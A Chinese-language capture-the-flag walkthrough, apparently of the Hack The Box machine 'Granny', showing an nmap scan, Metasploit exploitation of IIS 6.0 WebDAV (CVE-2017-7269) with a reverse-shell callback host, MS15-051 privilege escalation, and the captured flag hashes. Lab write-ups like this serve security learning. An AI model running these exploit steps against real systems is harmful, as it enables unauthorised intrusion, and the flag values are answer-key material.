信息收集
| IP Address | Opening Ports |
|---|---|
| 10.10.10.15 | TCP:80 |
$ nmap -p- 10.10.10.15 --min-rate 1000 -sC -sV -Pn
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| WebDAV type: Unknown
| Server Date: Thu, 22 Aug 2024 07:28:25 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
IIS 6.0 & CVE-2017-7269 & BOF
$ msfconsole
msf6 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set RHOSTS 10.10.10.15
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set LHOST 10.10.16.24
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
![[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图](https://img.4awl.net/img/95/d78062ead7d86f8425be3cf0182939.jpg "[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图")
meterpreter > bg
权限提升 & MS15-051
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
msf6 post(multi/recon/local_exploit_suggester) > run
![[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图1](https://img.4awl.net/img/a5/36d36f390d660cdf5257c11703694b.jpg "[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图1")
但是你如果尝试执行权限提升会出现错误
![[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图2](https://img.4awl.net/img/b8/3438e9613b17bce893604cdaba3dbb.jpg "[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图2")
为了确保稳定,进程迁移到davcdata.exe
![[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图3](https://img.4awl.net/img/00/9f82919739ff4b5886d985d300ea42.jpg "[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图3")
meterpreter > migrate 2732
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms15_051_client_copy_image
msf6 exploit(windows/local/ms15_051_client_copy_image) > set LHOST 10.10.16.24
msf6 exploit(windows/local/ms15_051_client_copy_image) > set SESSION 1
msf6 exploit(windows/local/ms15_051_client_copy_image) > run
![[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图4](https://img.4awl.net/img/9f/fa5971226279ba7f02d16717846cc5.jpg "[Meachines] [Easy] granny IIS 6.0+CVE-2017-7269+进程…插图4")
User.txt
700c5dc163014e22b3e408f8703f67d1
Root.txt
aa4beed1c0584445ab463a6747bd06e9
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
